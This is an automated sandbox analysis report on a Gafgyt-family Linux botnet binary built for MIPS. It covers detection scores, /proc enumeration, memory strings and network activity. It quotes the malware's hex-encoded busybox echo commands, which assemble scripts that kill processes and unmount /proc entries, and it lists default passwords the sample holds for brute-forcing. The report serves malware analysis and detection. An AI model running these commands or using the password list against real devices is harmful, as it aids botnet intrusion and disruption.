Edit tour

Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:mpsl.elf
Analysis ID:1654413
MD5:0ccb56febcbc3891ef94b774df223a3a
SHA1:41c712f58bf2fc7d7d04f559b04661427f0dde42
SHA256:203200be09f86ab14c53c903aa57aacd29e949f6377fffaa20d088852e40270c
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654413
Start date and time:2025-04-02 10:52:29 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mpsl.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/mpsl.elf
PID:5434
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • mpsl.elf (PID: 5434, Parent: 5358, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf
    • mpsl.elf New Fork (PID: 5438, Parent: 5434)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: mpsl.elfVirustotal: Detection: 40%Perma Link
Source: mpsl.elfReversingLabs: Detection: 36%
Source: /tmp/mpsl.elf (PID: 5438)Socket: 127.0.0.1:22448Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/4@2/0
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/5382/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/238/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/239/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/914/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/917/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/5277/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/5277/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/5277/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/240/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/3095/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/241/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/242/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1/mapsJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/244/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/245/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1588/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/247/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/800/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1906/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/802/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/803/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/3420/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/3420/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/3420/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1482/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1482/fdJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1482/mapsJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)File opened: /proc/1482/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5434)Queries kernel information via 'uname': Jump to behavior
Source: mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: exed the wor!/qemu-open.XXXXX
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: /tmp/qemu-open.SXsiu6
Source: mpsl.elf, 5434.1.000055b23097b000.000055b230a45000.rw-.sdmp, mpsl.elf, 5438.1.000055b23097b000.000055b230a45000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5438.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmpBinary or memory string: vmware
Source: mpsl.elf, 5434.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmp, mpsl.elf, 5438.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmpBinary or memory string: qemu-arm
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp, mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
Source: mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: mpsl.elf, 5434.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmp, mpsl.elf, 5438.1.00007fbdb843e000.00007fbdb8445000.rw-.sdmpBinary or memory string: D!!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
Source: mpsl.elf, 5434.1.000055b23097b000.000055b230a45000.rw-.sdmp, mpsl.elf, 5438.1.000055b23097b000.000055b230a45000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp, mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.SXsiu6\d
Source: mpsl.elf, 5434.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmp, mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
Source: mpsl.elf, 5438.1.00007fff5dc4b000.00007fff5dc6c000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1
Brute Force
Application Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654413 Sample: mpsl.elf Startdate: 02/04/2025 Architecture: LINUX Score: 48 11 daisy.ubuntu.com 2->11 13 Multi AV Scanner detection for submitted file 2->13 7 mpsl.elf 2->7         started        signatures3 process4 process5 9 mpsl.elf 7->9         started       
SourceDetectionScannerLabelLink
mpsl.elf41%VirustotalBrowse
mpsl.elf36%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    No contacted IP infos
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    daisy.ubuntu.comsh4.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.24
    s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    arm.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    FBI.arm.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    FBI.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    FBI.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.25
    FBI.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.25
    FBI.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    FBI.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    No context
    No context
    No context
    Process:/tmp/mpsl.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:TgLJLG:TgLFG
    MD5:F38566EE0BC1CD8FBC1A2366D5C73FFE
    SHA1:670B71B3B2F7C95A453BE48DE048B4D331E9AF5C
    SHA-256:8DE045D1FFCA4ADCA0440D72EE8946E5BE883FA1036732770285BF5A272DD618
    SHA-512:E57F865160CA30D18A02E3A408DC813DE15AB05E4831E8F92F431320C331C3D0F6806831E099DD93A1D07AC22AB7C890957DE1078C71EB711780F116AA228165
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/mpsl.elf.
    Process:/tmp/mpsl.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:TgLJLG:TgLFG
    MD5:F38566EE0BC1CD8FBC1A2366D5C73FFE
    SHA1:670B71B3B2F7C95A453BE48DE048B4D331E9AF5C
    SHA-256:8DE045D1FFCA4ADCA0440D72EE8946E5BE883FA1036732770285BF5A272DD618
    SHA-512:E57F865160CA30D18A02E3A408DC813DE15AB05E4831E8F92F431320C331C3D0F6806831E099DD93A1D07AC22AB7C890957DE1078C71EB711780F116AA228165
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/mpsl.elf.
    Process:/tmp/mpsl.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:TgLJLG:TgLFG
    MD5:F38566EE0BC1CD8FBC1A2366D5C73FFE
    SHA1:670B71B3B2F7C95A453BE48DE048B4D331E9AF5C
    SHA-256:8DE045D1FFCA4ADCA0440D72EE8946E5BE883FA1036732770285BF5A272DD618
    SHA-512:E57F865160CA30D18A02E3A408DC813DE15AB05E4831E8F92F431320C331C3D0F6806831E099DD93A1D07AC22AB7C890957DE1078C71EB711780F116AA228165
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/mpsl.elf.
    Process:/tmp/mpsl.elf
    File Type:ASCII text
    Category:dropped
    Size (bytes):362
    Entropy (8bit):3.8271042895218708
    Encrypted:false
    SSDEEP:6:UR5VceFXUFd2l/VeceFXUFkHVPj/VKAvVVyAb/3hM/V+4D/VH:Isey6beyGHyaVIAbRMfF
    MD5:0F75D2439A797C3D8C9FEC3E4D9D6689
    SHA1:1C5D6A0A6570A08E4F8BBA4D32B299CF7B95228D
    SHA-256:5295EEC2C1C3661547ECFF60983F7E2D51DDDB88593E03F9FD1F82EDDA2C68C2
    SHA-512:5A17AB720828DC869A64243F06C5CC56280A4EFCD6D722361D5B10563DC169582E0F15DAEEB93DA254030444F95BFB55906820DC6484CBD0E59B01EBF325842A
    Malicious:false
    Reputation:low
    Preview:400000-42d000 r-xp 00000000 fd:00 531567 /tmp/mpsl.elf.43d000-43e000 rw-p 0002d000 fd:00 531567 /tmp/mpsl.elf.43e000-445000 rw-p 00000000 00:00 0 .7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.7f7ff000-7f800000 ---p 00000000 00:00 0 .7f800000-80000000 rw-p 00000000 00:00 0 [stack].
    File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, stripped
    Entropy (8bit):5.151579209660246
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:mpsl.elf
    File size:186'616 bytes
    MD5:0ccb56febcbc3891ef94b774df223a3a
    SHA1:41c712f58bf2fc7d7d04f559b04661427f0dde42
    SHA256:203200be09f86ab14c53c903aa57aacd29e949f6377fffaa20d088852e40270c
    SHA512:f0f75a7882332424d0d9e2afdfbfbae095ef90fdf51f1c31a3477d007816bfb8f3091e6c71094f30ea81f2b522d985b38e24c377faf37fe42ddfa53223eea215
    SSDEEP:1536:nyUlqQlLgEhCkGpw9SqrmSbDrz4ies54bDKcElLbdTlnObr:nycqQtUdzieXed2
    TLSH:C1049486BF503EFFC85ECD3341A5CA0A159C89191294BFB76A34E418B79B10E99D3C9C
    File Content Preview:.ELF....................`.@.4...........4. ...(...............@...@. ... ...............<...<.C.<.C.\....N.............................................'...................<.Q.'!.............9'.. ........................<.P.'!... .........9'.. ............

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:MIPS R3000
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x400260
    Flags:0x1007
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:3
    Section Header Offset:186096
    Section Header Size:40
    Number of Section Headers:13
    Header String Table Index:12
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .initPROGBITS0x4000940x940x7c0x00x6AX004
    .textPROGBITS0x4001100x1100x2a0200x00x6AX0016
    .finiPROGBITS0x42a1300x2a1300x4c0x00x6AX004
    .rodataPROGBITS0x42a1800x2a1800x2aa00x00x2A0016
    .ctorsPROGBITS0x43d03c0x2d03c0x80x00x3WA004
    .dtorsPROGBITS0x43d0440x2d0440x80x00x3WA004
    .data.rel.roPROGBITS0x43d0500x2d0500xa80x00x3WA004
    .dataPROGBITS0x43d1000x2d1000xc00x00x3WA0016
    .gotPROGBITS0x43d1c00x2d1c00x4d80x40x10000003WAp0016
    .sbssNOBITS0x43d6980x2d6980x1c0x00x10000003WAp004
    .bssNOBITS0x43d6c00x2d6980x48000x00x3WA0016
    .shstrtabSTRTAB0x00x2d6980x560x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    LOAD0x00x4000000x4000000x2cc200x2cc205.16960x5R E0x10000.init .text .fini .rodata
    LOAD0x2d03c0x43d03c0x43d03c0x65c0x4e844.73060x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
    DYNAMIC0x00x00x00x00x00.00000x7RWE0x4

    Download Network PCAP: filteredfull

    TimestampSource PortDest PortSource IPDest IP
    Apr 2, 2025 10:53:21.085181952 CEST4787853192.168.2.131.1.1.1
    Apr 2, 2025 10:53:21.085182905 CEST3476753192.168.2.131.1.1.1
    Apr 2, 2025 10:53:21.184479952 CEST53347671.1.1.1192.168.2.13
    Apr 2, 2025 10:53:21.184504986 CEST53478781.1.1.1192.168.2.13
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
